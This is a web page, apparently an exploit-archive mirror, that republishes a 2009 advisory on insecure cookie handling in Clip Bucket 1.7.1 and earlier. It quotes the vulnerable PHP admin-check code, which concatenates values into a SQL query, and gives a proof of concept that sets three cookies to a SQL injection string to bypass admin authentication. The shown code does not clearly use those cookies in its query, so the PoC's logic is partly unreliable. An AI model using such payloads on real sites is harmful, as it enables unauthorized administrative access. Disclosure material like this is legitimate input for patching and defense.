header-logo
Suggest Exploit
vendor:
Clip Bucket
by:
Qabandi
7,5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: Clip Bucket
Affected Version From: 1.7.1
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:clipbucket:clip_bucket
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

Clip Bucket <= 1.7.1 Insecure Cookie Handling

Clip Bucket version 1.7.1 and earlier are vulnerable to insecure cookie handling. An attacker can exploit this vulnerability to gain access to the application and perform malicious activities. This vulnerability is due to the application not properly validating the cookie values. An attacker can exploit this vulnerability to gain access to the application and perform malicious activities.

Mitigation:

Upgrade to the latest version of Clip Bucket or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

                                            ||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Clip Bucket <= 1.7.1 Insecure Cookie Handling
=INFO:		http://clip-bucket.com/
=BUY:  		---
=Download:      http://clip-bucket.com/download
=DORK:	  :) 

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE OFF

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "\includes\classes\user.class.php"

	function admin_check(){
		$admin = 'Admin';
        if(isset($_COOKIE['userid']) && isset($_COOKIE['username']) && isset($_COOKIE['session']))
        {
		$userid = @$_SESSION['userid'];
		$username = @$_SESSION['username'];
		$session = @$_COOKIE['PHPSESSID'];

					$query = mysql_query("SELECT * FROM users WHERE level='".$admin."' AND username ='".$username."' AND userid = '".$userid."' AND session='".$session."'");
					if(mysql_num_rows($query)>0){
					$answer = 1;
                    return $answer;
					}else{
					$answer = 0;
                    return $answer;
					}
        }
		}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set Cookies:

userid=q' or 1='1
username=q' or 1='1
session=q' or 1='1


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah

---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      ----------------------------------------------------------------------  |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR